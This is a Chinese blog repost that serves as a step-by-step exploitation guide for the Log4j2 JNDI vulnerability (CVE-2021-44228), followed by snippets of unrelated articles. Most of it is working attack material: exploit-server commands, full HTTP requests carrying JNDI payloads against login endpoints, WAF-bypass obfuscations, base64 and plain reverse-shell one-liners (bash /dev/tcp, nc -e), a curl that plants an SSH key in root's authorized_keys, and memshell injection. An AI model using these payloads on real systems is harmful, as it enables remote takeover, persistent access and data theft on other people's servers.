log4j2漏洞综合利用_CVE-2021-44228_CNVD-2021-95919

news2024/11/16 7:43:09

1.漏洞利用

1.1.rmi 利用

1、在检测到目标存在 log4j2 漏洞后,确定漏洞参数,尝试接受目标 rmi 请求。
image.png
成功接收到请求。
出现 JRMIK 字样即代表可接受 RMI 请求。
image.png
2、漏洞利用。
使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar执行命令,反弹 shell。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcCxxxPiYx}|{base64,-d}|{bash,-i}" -A "vpsip"

image.png

POST /api/user/login?_appId=%24%7B%3A-y%24%7D%7B%24%7B8hd%3A-j%7Dnd%24%7Benv%3A2h7%3A-%7Di%3Ar%24%7B1gf%3A%3A-m%7Di%3A%2F%2F1.1.1.92%3A80%2Fi%2FhcSvqI7U%2F01206f%2Fc916%2F4g3n%2FPQ5P8iBh%2F%3FType%3DA+Type%26Name%3D1100110%26Char%3D%21%7D&_t=%24%7B%3A-y%24%7D%7B%24%7B8hd%3A-j%7Dnd%24%7Benv%3A2h7%3A-%7Di%3Ar%24%7Bza8%3A%3A-m%7Di%3A%2F%2F1.1.1.12%3A80%2Fi%2FhcSvqI7U%2F8dc211%2Fc916%2Fgof6%2FPQ5P8iBh%2F%3FType%3DA+Type%26Name%3D1100110%26Char%3D%21%7D HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 375
Accept: application/json, text/plain, */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Cookie: fvlid=
Referer: ${:-y$}{${8hd:-j}nd${env:2h7:-}i:r${3qa::-m}i://1.1.1.2:80/i/hcSvqI7U/57bae1/c916/gck9/PQ5P8iBh/?Type=A Type&Name=1100110&Char=!}
Accept-Encoding: gzip
cmd: whoami

account=%24%7B%3A-y%24%7D%7B%24%7B8hd%3A-j%7Dnd%24%7Benv%3A2h7%3A-%7Di%3Ar%24%7Ba9a%3A%3A-m%7Di%3A%2F%2F1.1.2.2%3A80%2Fi%2FhcSvqI7U%2Fd350f4%2Fc916%2Fuhop%2FPQ5P8iBh%2F%3FType%3DA+Type%26Name%3D1100110%26Char%3D%21%7D&code=%24%7B%3A-y%24%7D%7B%24%7B8hd%3A-j%7Dnd%24%7Benv%3A2h7%3A-%7Di%3Ar%24%7B508%3A%3A-m%7Di%3A%2F%2F1.1.1.192%3A1099%2Faawd9c%7D&guid=111&password=22

image.png
成功接收 RMI 请求。
image.png
反弹 shell 成功。
image.png

1.2.ldap利用

1.2.1.零散命令

常规payload

${jndi:ldap://u50qrz.dnslog.cn}
${jndi:ldap://xxx:1222}

ping qfhfxl.ceye.io
${jndi:ldap://xxx:1389/TomcatBypass/Command/base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDcuMTcyLjIxNi41Ni80NDMgMD4mIDE=}
bash -i >& /dev/tcp/xxx/443 0>& 1


bash -i >& /dev/tcp/xxx/22333 0>& 1

find / -name bootstrap.min.css |while read f;do sh -c 'pwd' >$(dirname $f)/mds.txt;done
${jndi:ldap://xxx:1389/TomcatBypass/Command/base64/ZmluZCAvIC1uYxxxZHMudHh0O2RvbmU=}
curl xxx:1111/a.txt >> /root/.ssh/authorized_keys

nc -e /bin/bash 192.168.0.4 7777

${jndi:ldap://xxx:1389/TomcatBypass/TomcatMemshell1}
/anything?type=basic&pass=whoami

回显版本:
${jndi:ldap://${sys:java.version}.u50qrz.dnslog.cn}
${jndi:ldap://xxx:80/${hostName}-${sys:user.dir}-${sys:java.version}-${java:os}}

bypass payload

Bypass rc1
For example:
${jndi:ldap://127.0.0.1:1389/ badClassName}

Bypass WAF
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

1.2.2.实战案例

1.2.2.1.Tomcatecho

vps 开启ldap监听。

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i vpsip -l 1389

发送回显漏洞数据包。

POST /api/2.0/login HTTP/1.1
Host: xxxx
Cookie: JSESSIONID_AV=xx
Content-Length: 84
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://xx:7443
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
cmd: whoami
Referer: https://xxx:7443/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

{"username":"${jndi:ldap://xxx:1389/Basic/TomcatEcho}","password":"admin"}

image.png

1.2.2.2.TomcatBypass/Command/base64/xxxx

vps 开启ldap监听。

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i vpsip -l 1389

发送漏洞数据包,请求 vps 对应 ldap 地址。

POST /seeyon/main.do?method=login HTTP/1.1
Host: xxx
Content-Length: 370
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx:9999/seeyon/index.jsp
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0F3E133EAB4688739F1AA733B8A77CBA; loginPageURL=
Connection: close

authorization=&login.timezone=GMT%2B8%3A00&province=&city=&rectangle=&login_username=${jndi:ldap://xxx:1389/TomcatBypass/Command/base64/Y3VybxxxjcwOjgwMDAvMTExMTE=}&trustdo_type=&login_password=U2FsdGVkX1%2FdIKuc3ct%2BcYJ62F%2FsYijyStjhTVGDO4mlgFwLNPPwJererJluQjhy&login_validatePwdStrength=4&random=&fontSize=12&screenWidth=1920&screenHeight=1080

//command:curl xxx:8000/11111

image.png
image.png

1.2.2.3.TomcatMemshell1

vps 开启ldap监听。

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i vpsip -l 1389

发送漏洞数据包,请求 vps 对应 ldap 地址。

${jndi:ldap://xxx:1389/TomcatBypass/TomcatMemshell1}
http://xxx/seeyon/anything?type=basic&pass=ifconfig

image.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1390906.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SAP 销售订单审批状态(查询/修改)

销售订单审批状态启用后,前端显示界面如下图 销售订单审批状态读取:STATUS_READ 销售订单审批状态修改:I_CHANGE_STATUS 销售订单审批状态读取 代码样例如下: DATA: lv_objnr TYPE vbak-objnr,lv_objnr_t TYPE jsto-objnr,l…

区间预测 | Matlab实现BiLSTM-Adaboost-ABKDE的集成双向长短期记忆网络自适应带宽核密度估计多变量回归区间预测

区间预测 | Matlab实现BiLSTM-Adaboost-ABKDE的集成双向长短期记忆网络自适应带宽核密度估计多变量回归区间预测 目录 区间预测 | Matlab实现BiLSTM-Adaboost-ABKDE的集成双向长短期记忆网络自适应带宽核密度估计多变量回归区间预测效果一览基本介绍程序设计参考资料 效果一览 …

soso移动营业大厅(纯后端+MySQL数据库+JDBC)

一、项目需求 中国移动,中国联通,中国电信是国内3大通信运营商,每个运营商都提供了不同的品牌套餐来应对不同的用户群,比如北京移动主要有全球通,神州行,动感地带等3大品牌套餐,每种套餐的内容和费用不同,嗖嗖移动是一个假定的通信运营商,提供了话痨套餐,网虫套餐,超人套餐,各…

ElasticSearch入门篇

目录 一、 ElasticSearch的定位 二、 什么是倒排索引 三、 什么是全文检索 四、 ElasticSearch的数据存储原理 4.1 ElasticSearch与关系型数据库的数据结构对比 4.2 ElasticSearch的倒排索引原理 一、 ElasticSearch的定位 ElasticSearch是一款开源的分布式 搜索和…

【Linux终端工具】Tmux的使用教程,如何正确使用Tmux

文章目录 入门tmux什么是tmux?安装tmux快速启动tmux基本操作入门1. 分离与退出2. 帮助信息3. 新建会话4. 重新接入会话5. 窗格操作 进阶操作1. 会话管理2. 切换窗口3. 窗格间切换 总结 入门tmux 什么是tmux? tmux是一款终端复用器,它允许你…

一、ArcGIS Pro SDK for Microsoft .NET 开发环境配置

ArcGIS Pro二次开发需要的工具: 1.Visual Studio 2.ArcGIS Pro SDK 一、Visual Studio安装 经过查阅资料,ArcGIS Pro3.0版本需要安装Visual Studio2022版,因为只有22版的才会有有ArcGIS Pro3.0以上版对应ArcGIS Pro SDK,因此&…

MySQL核心SQL

一.结构化查询语言 SQL是结构化查询语言(Structure Query Language),它是关系型数据库的通用语言。 SQL 主要可以划分为以下 3 个类别: DDL(Data Definition Languages)语句 数据定义语言,这…

通过Canal实现缓存同步

文章目录 1.数据同步策略2.初始Canal3.安装Canal4.监听Canal 1.数据同步策略 2.初始Canal 3.安装Canal 见文章安装Canal详情 4.监听Canal

【Web】websocket应用的是哪个协议

🍎个人博客:个人主页 🏆个人专栏:Web ⛳️ 功不唐捐,玉汝于成 前言 在当今互联网时代,实时性和即时通讯成为网络应用日益重要的一部分。WebSocket 协议作为一种创新性的通信协议,极大地改善了…

网页设计(八)HTML5基础与CSS3应用

一、当当网企业用户注册页面设计 当当网企业用户注册页面 改版后当当网企业用户注册页面 <!-- prj_8_1.html --> <!DOCTYPE html> <html><head><meta charset"UTF-8"><title>当当网企业用户注册页面设计</title><s…

圈小猫游戏HTML源码

源码介绍 圈小猫游戏html源码&#xff0c;HTMLCSSJS,记事本可以打开修改内容&#xff0c;电脑本地双击index.html即可运行&#xff0c;也可以上传到服务器上面运行&#xff0c;喜欢的同学可以拿去使用 下载地址 蓝奏云&#xff1a;https://wfr.lanzout.com/iFkVc1lb5akj CS…

【MATLAB源码-第113期】基于matlab的孔雀优化算法(POA)机器人栅格路径规划,输出做短路径图和适应度曲线。

操作环境&#xff1a; MATLAB 2022a 1、算法描述 POA&#xff08;孔雀优化算法&#xff09;是一种基于孔雀羽毛开屏行为启发的优化算法。这种算法模仿孔雀通过展开其色彩斑斓的尾羽来吸引雌性的自然行为。在算法中&#xff0c;每个孔雀代表一个潜在的解决方案&#xff0c;而…

NFS(Network File System 网络文件服务)

一&#xff0c;nfs 简介 1&#xff0c;nfs 性质 NFS&#xff08;Network File System 网络文件服务&#xff09; 文件系统&#xff08;软件&#xff09;文件的权限 NFS 是一种基于 TCP/IP 传输的网络文件系统协议 通过使用 NFS 协议&#xff0c;客户机可以像访问本地目录一样…

找不到msvcr100.dll怎么办?msvcr100.dll丢失的解决方法

在面对计算机系统中“msvcr100.dll”文件缺失这一常见问题时&#xff0c;用户可能会遇到应用程序无法正常启动或运行的情况。为了解决这一困扰广大用户的难题&#xff0c;本文将详细介绍并解析找不到“msvcr100.dll”文件的5种有效解决方法。 一、了解一下msvcr100.dll是什么&a…

[论文精读]Few-shot domain-adaptive anomaly detection for cross-site brain images

论文网址&#xff1a;Few-shot domain-adaptive anomaly detection for cross-site brain images | IEEE Journals & Magazine | IEEE Xplore 英文是纯手打的&#xff01;论文原文的summarizing and paraphrasing。可能会出现难以避免的拼写错误和语法错误&#xff0c;若有…

怎么修改或移除WordPress后台仪表盘概览底部的版权信息和主题信息?

前面跟大家分享『WordPress怎么把后台左上角的logo和评论图标移除&#xff1f;』和『WordPress后台底部版权信息“感谢使用 WordPress 进行创作”和版本号怎么修改或删除&#xff1f;』&#xff0c;其实在WordPress后台仪表盘的“概览”底部还有一个WordPress版权信息和所使用的…

鸿蒙入门实战-ArkTS开发

声明式UI基本概念 应用界面是由一个个页面组成&#xff0c;ArkTS是由ArkUI框架提供&#xff0c;用于以声明式开发范式开发界面的语言。 声明式UI构建页面的过程&#xff0c;其实是组合组件的过程&#xff0c;声明式UI的思想&#xff0c;主要体现在两个方面&#xff1a; 描述…

Simulink简介

Simulink 是一个模块图环境&#xff0c;用于多域仿真以及基于模型的设计。它支持系统级设计、仿真、自动代码生成以及嵌入式系统的连续测试和验证。Simulink 提供图形编辑器、可自定义的模块库以及求解器&#xff0c;能够进行动态系统建模和仿真。Simulink 与 MATLAB 相集成&am…

EChars

1.引入 Apache ECharts <!DOCTYPE html> <html><head><meta charset"utf-8" /><!-- 引入刚刚下载的 ECharts 文件 --><script src"echarts.js"></script></head> </html> 2. <!-- 为 ECharts 准…

浅谈电动汽车充电站箱变电气安全物联监测系统设计与应用

摘 要:基于物联网技术架构提出了一种适用于电动汽车充电站箱变的电气安全物联监测系统设计方案。该系统由电气安全智能感知设备、通信网关、电气安全物联网监测平台等构成&#xff0c;可支持充电站箱变充电桩出线回路电流、电缆 温度、剩余电流、故障电弧、短路电流等数据采集监…